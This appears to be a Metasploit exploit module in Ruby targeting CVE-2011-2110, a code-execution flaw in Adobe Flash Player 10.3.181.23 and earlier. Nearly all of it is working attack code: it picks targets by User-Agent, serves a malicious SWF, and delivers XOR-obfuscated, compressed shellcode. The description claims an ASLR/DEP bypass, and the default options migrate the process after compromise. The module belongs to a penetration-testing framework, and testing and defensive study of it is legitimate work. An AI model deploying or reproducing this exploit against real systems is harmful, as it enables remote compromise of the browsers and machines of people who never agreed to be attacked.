1
##
2
# This module requires Metasploit: https://metasploit.com/download
3
# Current source: https://github.com/rapid7/metasploit-framework
4
##
5

6
class MetasploitModule < Msf::Exploit::Remote
7
  Rank = GreatRanking
8

9
  include Msf::Exploit::Remote::HttpServer::HTML
10

11
  def initialize(info = {})
12
    super(
13
      update_info(
14
        info,
15
        'Name' => 'Adobe Flash Player AVM Verification Logic Array Indexing Code Execution',
16
        'Description' => %q{
17
          This module exploits a vulnerability in Adobe Flash Player versions 10.3.181.23
18
          and earlier. This issue is caused by a failure in the ActionScript3 AVM2 verification
19
          logic. This results in unsafe JIT(Just-In-Time) code being executed. This is the same
20
          vulnerability that was used for attacks against Korean based organizations.
21

22
          Specifically, this issue occurs when indexing an array using an arbitrary value,
23
          memory can be referenced and later executed. Taking advantage of this issue does not rely
24
          on heap spraying as the vulnerability can also be used for information leakage.
25

26
          Currently this exploit works for IE6, IE7, IE8, Firefox 10.2 and likely several
27
          other browsers under multiple Windows platforms. This exploit bypasses ASLR/DEP and
28
          is very reliable.
29
        },
30
        'License' => MSF_LICENSE,
31
        'Author' => [
32
          'mr_me <steventhomasseeley[at]gmail.com>', # msf exploit
33
          'Unknown' # malware version seen used in targeted attacks
34
        ],
35
        'References' => [
36
          ['CVE', '2011-2110'],
37
          ['OSVDB', '73007'],
38
          ['BID', '48268'],
39
          ['URL', 'http://www.adobe.com/devnet/swf.html'],
40
          ['URL', 'http://www.adobe.com/support/security/bulletins/apsb11-18.html'],
41
          ['URL', 'http://www.accessroot.com/arteam/site/download.php?view.331'],
42
          ['URL', 'http://www.shadowserver.org/wiki/pmwiki.php/Calendar/20110617'],
43
        ],
44
        'DefaultOptions' => {
45
          'EXITFUNC' => 'process',
46
          'HTTP::compression' => 'gzip',
47
          'HTTP::chunked' => true,
48
          'InitialAutoRunScript' => 'post/windows/manage/priv_migrate'
49
        },
50
        'Payload' => {
51
          'Space' => 2000,
52
          'BadChars' => "\x00",
53
          'DisableNops' => true
54
        },
55
        'Platform' => 'win',
56
        'Targets' => [
57
          [ 'Automatic', {}],
58
        ],
59
        'DisclosureDate' => '2012-06-21',
60
        'DefaultTarget' => 0,
61
        'Notes' => {
62
          'Reliability' => UNKNOWN_RELIABILITY,
63
          'Stability' => UNKNOWN_STABILITY,
64
          'SideEffects' => UNKNOWN_SIDE_EFFECTS
65
        }
66
      )
67
    )
68
  end
69

70
  def exploit
71
    # src for the flash file: external/source/exploits/CVE-2011-2110/CVE-2011-2110.as
72
    # full aslr/dep bypass using the info leak as per malware
73
    path = File.join(Msf::Config.data_directory, "exploits", "CVE-2011-2110.swf")
74
    fd = File.open(path, "rb")
75
    @swf = fd.read(fd.stat.size)
76
    fd.close
77
    super
78
  end
79

80
  def check_dependencies
81
    use_zlib
82
  end
83

84
  def get_target(agent)
85
    # If the user is already specified by the user, we'll just use that
86
    return target if target.name != 'Automatic'
87

88
    if agent =~ /MSIE/
89
      return targets[0]  # ie 6/7/8 tested working
90
    elsif agent =~ /Firefox/
91
      return targets[0]  # ff 10.2 tested working
92
    else
93
      return nil
94
    end
95
  end
96

97
  def on_request_uri(cli, request)
98
    agent = request.headers['User-Agent']
99
    my_target = get_target(agent)
100

101
    # Avoid the attack if the victim doesn't have the same setup we're targeting
102
    if my_target.nil?
103
      print_error("#{cli.peerhost}:#{cli.peerport} - Browser not supported: #{agent.to_s}")
104
      send_not_found(cli)
105
      return
106
    end
107

108
    xor_byte = 122
109
    trigger = @swf
110
    trigger_file = rand_text_alpha(rand(6) + 3) + ".swf"
111
    code = rand_text_alpha(rand(6) + 3) + ".txt"
112

113
    sc = Zlib::Deflate.deflate(payload.encoded)
114
    shellcode = ""
115

116
    sc.each_byte do |c|
117
      shellcode << (xor_byte ^ c)
118
    end
119

120
    uri = "#{get_uri(cli)}/#{code}"
121

122
    bd_uri = Zlib::Deflate.deflate(uri)
123

124
    uri = ""
125
    bd_uri.each_byte do |c|
126
      uri << (xor_byte ^ c)
127
    end
128

129
    bd_uri = uri.unpack("H*")[0]
130

131
    obj_id = rand_text_alpha(rand(6) + 3)
132

133
    if request.uri.match(/\.swf/i)
134
      print_status("Sending malicious swf")
135
      send_response(cli, trigger, { 'Content-Type' => 'application/x-shockwave-flash' })
136
      return
137
    end
138

139
    if request.uri.match(/\.txt/i)
140
      print_status("Sending payload")
141
      send_response(cli, shellcode, { 'Content-Type' => 'text/plain' })
142
      return
143
    end
144

145
    html = <<-EOS
146
    <html>
147
    <head>
148
    </head>
149
    <body>
150
    <center>
151
    <object classid="clsid:D27CDB6E-AE6D-11cf-96B8-444553540000"
152
    id="#{obj_id}" width="600" height="400"
153
    codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab">
154
    <param name="movie" value="#{get_resource}/#{trigger_file}?info=#{bd_uri}" />
155
    <embed src="#{get_resource}/#{trigger_file}?info=#{bd_uri}" quality="high"
156
    width="320" height="300" name="#{obj_id}" align="middle"
157
    allowNetworking="all"
158
    type="application/x-shockwave-flash"
159
    pluginspage="http://www.macromedia.com/go/getflashplayer">
160
    </embed>
161
    </object>
162
    </center>
163
    </body>
164
    </html>
165
    EOS
166

167
    html = html.gsub(/^ {4}/, '')
168

169
    print_status("Sending #{self.name} HTML")
170
    send_response(cli, html, { 'Content-Type' => 'text/html' })
171
  end
172
end
173

174